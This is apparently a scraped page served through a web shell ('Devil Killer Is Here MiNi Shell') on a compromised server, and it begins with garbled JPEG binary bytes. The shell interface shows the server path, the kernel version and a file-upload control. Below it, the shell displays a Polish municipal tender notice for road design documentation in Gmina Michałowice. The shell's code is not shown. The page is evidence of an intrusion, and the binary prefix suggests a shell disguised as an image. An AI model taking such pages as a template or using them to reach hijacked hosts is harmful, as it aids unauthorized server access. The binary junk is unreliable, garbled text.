JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221018/0039847001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie dokumentacji projektowo-kosztorysowej przebudowy dróg na terenie Gminy Michałowice”-II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MICHAŁOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269290</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Powstańców Warszawy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reguły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-816</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 350 91 91</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sektetariat@michalowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.michalowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie dokumentacji projektowo-kosztorysowej przebudowy dróg na terenie Gminy Michałowice”-II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-17023b52-4ee6-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00398470</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022724/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.32 Opracowanie dokumentacji projektowo-kosztorysowej przebudowy dróg na terenie Gminy Michałowice (ul. Komorowska w Pęcicach Małych, ul. Okrężna w Granicy i w Komorowie, ul. Norwida w Komorowie)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.michalowice.pl/zamowienia-publiczne/ogloszenia-przetargow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz<br/>Regulaminie ePUAP.<br/>4) Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150 MB.<br/>6) Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP.<br/>7) W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal<br/>(Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania nadanym<br/>przez Zamawiającego.<br/>8) Przekazanie korespondencji w sposób opisany w ust. 7 wymaga obowiązkowego poinformowania Zamawiającego o przekazaniu<br/>wiadomości na adres e-mail wskazany w rozdziale I „Zamawiający” (niedopełnienie tego obowiązku uznane będzie jako<br/>nieskuteczne przekazanie dokumentów). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, e-mail wskazanym w rozdziale I – „Zamawiającego” i „Prowadzącego postępowanie” .<br/>9) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email<br/>wskazany w ust. 8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>10) Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>2. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych (dalej: „Administrator”) jest GMINA<br/>MICHAŁOWICE 05-816 Michałowice, Reguły ul. Aleja Powstańców Warszawy 1 tel. 22 350 91 91; fax: 22 350 91 01 e-mail:<br/>sekretariat@michalowice.pl<br/>2. W sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych Panem Piotrem Glen,<br/>kontakt pisemny za pomocą poczty tradycyjnej na adres wskazany powyżej bądź email: daneosobowe@michalowice.pl;<br/>3. Dane osobowe zawarte w ofertach są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do<br/>wypełnienia obowiązku prawnego ciążącego na administratorze oraz następujące przepisy prawa: ustawa z dnia 11 września 2019 r.<br/>- Prawo zamówień publicznych (Dz.U. Dz.U. 2019 poz. 2019), rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415), ustawa o narodowym zasobie archiwalnym i archiwach (tj. Dz.U. 2020 poz. 164 ze zm.).<br/>4. Celem przetwarzania danych osobowych jest prowadzenie w imieniu własnym postępowań o udzielenie zamówień publicznych.<br/>Przetwarzanie danych osobowych na potrzeby ww. postępowań mieści się w zakresie obowiązków ustawowych Urzędu Gminy jako<br/>zamawiającego w rozumieniu art. 4 ust. 1 ustawy PZP. Przetwarzanie tych danych jest niezbędne, aby Urząd Gminy mógł<br/>prawidłowo wypełniać nałożone na nie obowiązki.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia swoich danych, co wynika z rozporządzenia RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Prawo zamówień<br/>publicznych. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18<br/>ust. 1 rozporządzenia RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania. Zasada<br/>jawności, o której mowa w art. 74 ustawy Prawo zamówień publicznych ma zastosowanie do wszystkich danych osobowych, z<br/>wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (danych szczególnej kategorii), zebranych w toku postępowania o<br/>udzielenie zamówienia publicznego. Więcej informacji dostępnych jest w Rozdz. XXVI SWZ „Klauzula informacyjna RODO”</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.69.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla:<br/>1)	przebudowy ulicy Komorowskiej w Pęcicach Małych na działce nr ewid. 14/3, 13 obręb Pęcice Małe w Pęcicach Małych i elementami odwodnienia,<br/> <br/>2.	Zakres przedmiotu zamówienia obejmuje opracowanie kompletnych projektów budowlanych obejmujących:<br/>1)	przygotowanie i uzgodnienie z Zamawiającym dwóch wielobranżowych koncepcji zagospodarowania terenu dla:<br/>a)	przebudowy ulicy Komorowskiej w Pęcicach Małych,<br/><br/>2)	opracowanie projektu budowlanego zgodnie z obowiązującymi przepisami dla danej ulicy (części), w tym:<br/>a)	uzyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania projektu przebudowy drogi wojewódzkiej, uzyskania wszelkich opinii i uzgodnień,<br/>b)	przygotowanie materiałów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, o której mowa w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2022 r., poz. 1029 ze zm.) wraz z przygotowaniem wniosku o wydanie w/w decyzji (jeżeli dotyczą),<br/>c)	opracowanie dokumentacji geotechnicznej z rozpoznaniem warunków gruntowych,<br/>d)	opracowanie kompletnego projektu budowlanego (obejmującego wszystkie branże) wymaganego przepisami Prawa Budowlanego i spełniającego rozporządzenie Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2020 r., poz. 1609 ze zm.), wraz z opisami i rysunkami niezbędnymi do realizacji robót,<br/>e)	informacja BIOZ (jeżeli będzie wymagana),<br/>f)	uzyskanie wszystkich wymaganych uzgodnień, opinii, warunków technicznych, pozwoleń, decyzji umożliwiających realizację robót w tym pozwolenie na budowę lub niezbędnych do zgłoszenia budowy wraz ze skutecznym zgłoszeniem budowy,<br/>g)	wykonanie projektów podziałów nieruchomości do decyzji ZRiD dla części 2 <br/>h)	przygotowanie materiałów niezbędnych do wniosku o zezwolenie na realizacje inwestycji drogowej wraz z uzyskaniem decyzji ZRiD dla części 2 zgodnie z zasadami i warunkami podanymi w Ustawie z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2022 r. poz. 176).<br/>i)	opracowanie operatów wodno-prawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli dotyczą),<br/>j)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących z inwestycją, w razie konieczności,<br/>k)	przygotowanie projektu inwentaryzacji zieleni warunkującego otrzymanie pozwolenia na wycinkę drzew kolidujących z inwestycją (jeżeli dotyczą),<br/>l)	opracowanie i uzgodnienie (zatwierdzenie) kompletnego projektu stałej organizacji ruchu,<br/>3)	opracowanie dokumentacji niezbędnej do wykonania zamierzenia inwestycyjnego, w tym:<br/>a)	opracowanie szczegółowych przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonywania, z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych; <br/>b)	opracowanie kosztorysu inwestorskiego, który należy sporządzić i przekazać w wersji pdf oraz w wersji ath. Kosztorysy należy sporządzić zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz.U. z 2021r. poz. 2458) ;<br/>c)	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości robót, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji. Specyfikacje należy przygotować zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021r. poz. 2454).<br/>3.	Przedmiot zamówienia obejmuje swoim zakresem opracowanie kompletnych projektów budowlanych w tym:<br/>1)	projektu zagospodarowania terenu, <br/>2)	projektu architektoniczno-budowlanego.<br/>4.	W dokumentacji projektowej Wykonawca powinien zastosować oprawy drogowe LED z energooszczędnym modułem LED charakteryzującym się wysoką skutecznością świetlną – min. 136 lm/W oraz parametry wskazane poniżej: <br/>1)	temperatura barwowa odpowiednio dobrana do funkcji i wykorzystania oświetlanego terenu, <br/>2)	lampa powinna charakteryzować się bardzo wysokim stopniem szczelności IP66 oraz odpornością na udary mechaniczne IK08,<br/>3)	zintegrowany, regulowany skokowo co 5 stopni uchwyt ma pozwolić na regulację w zakresie: 0° do +15° (szczytowy, na słupie); -15° do 0° (boczny, na wysięgniku), CLO - utrzymanie strumienia świetlnego w czasie; dodatkowe zabezpieczenie przepięciowe (SP10kV), I lub II klasa ochronności , <br/>4)	pozostałe wymagania w zakresie doboru rodzaju oświetlenia w tym m.in.:<br/>a) rodzaju opraw (zintegrowane lub nie, świecące bezpośrednio lub z odbicia - światło rozproszone), <br/>b)	temperatury barwowej w zależności od lokalizacji, <br/>c)	wymagań w zakresie energooszczędności, <br/>d)	kompensacji mocy biernej, <br/>e)	cyklu życia projektowanych urządzeń i produktów, <br/>f)	ich wpływu na środowisko zostaną uzgodnione na etapie wykonywania zamówienia.<br/>5.	Przy projektowaniu Wykonawca zobowiązany będzie wziąć pod uwagę odpowiednie rozwiązanie minimalizujące moc bierną. <br/>6.	W dokumentacji objętej przedmiotem zamówienia należy wskazać rozwiązania dostępne na rynku, które zarówno w procesie produkcji mają możliwie mały wpływ na środowisko jak i w trakcie eksploatacji, jak i po zakończeniu cyklu życia opraw/źródeł światła. Wraz z podaniem odpowiednich systemów certyfikacji/norm dzięki którym możliwa będzie weryfikacja materiałów proponowanych przez wykonawców instalacji.<br/>7.	Wykonawca jest zobowiązany do zaprojektowania wariantowego układu zdalnego sterowania oświetleniem, w tym możliwości wielostopniowej redukcji mocy oraz zdalnej kontroli stanu instalacji, instalacji do ściemniania grupowego.<br/>8.	Wykonawca zobowiązany jest do opracowania opisu urządzeń i systemów zgodnie z zasadami ustawy Pzp oraz zasadami dostępności, a także określenia jakości poprzez odniesienie do systemów certyfikacji i norm o ile są dostępne w celu weryfikacji rozwiązań proponowanych przez wykonawców instalacji oświetlenia ulicznego.<br/>9.	W ramach przedmiotu zamówienia Wykonawca opracuje dokumentację projektową dla poniższych dróg:<br/>1)	ulicy Komorowskiej w Pęcicach Małych, obejmującej (część I):<br/>a)	przebudowę ulicy Komorowskiej w Pęcicach Małych, na działce nr ewid. 14/3, 13 obręb Pęcice Małe w Pęcicach Małych i elementami odwodnienia, <br/>b)	budowę chodnika na odcinku od ul. Leśnej do ul. Marii Konopnickiej o długości ok. 70 m wraz z wpustami ulicznymi do istniejącej kanalizacji deszczowej. <br/><br/>10.	Dla poszczególnych ulic objętych przedmiotem zamówienia Wykonawca zobowiązany będzie wykonać odrębną stosowną dokumentację techniczną, prawną oraz uzyskać stosowne pozwolenia na realizację inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">231 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla:<br/><br/>2)	rozbudowy ulicy Piachy w Pęcicach Małych wraz z uzyskaniem decyzji ZRiD,<br/><br/>2.	Zakres przedmiotu zamówienia obejmuje opracowanie kompletnych projektów budowlanych obejmujących:<br/>1)	przygotowanie i uzgodnienie z Zamawiającym dwóch wielobranżowych koncepcji zagospodarowania terenu dla:<br/><br/>b)	rozbudowy ulicy Piachy w Pęcicach Małych, <br/><br/>2)	opracowanie projektu budowlanego zgodnie z obowiązującymi przepisami dla danej ulicy (części), w tym:<br/>a)	uzyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania projektu przebudowy drogi wojewódzkiej, uzyskania wszelkich opinii i uzgodnień,<br/>b)	przygotowanie materiałów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, o której mowa w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2022 r., poz. 1029 ze zm.) wraz z przygotowaniem wniosku o wydanie w/w decyzji (jeżeli dotyczą),<br/>c)	opracowanie dokumentacji geotechnicznej z rozpoznaniem warunków gruntowych,<br/>d)	opracowanie kompletnego projektu budowlanego (obejmującego wszystkie branże) wymaganego przepisami Prawa Budowlanego i spełniającego rozporządzenie Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy 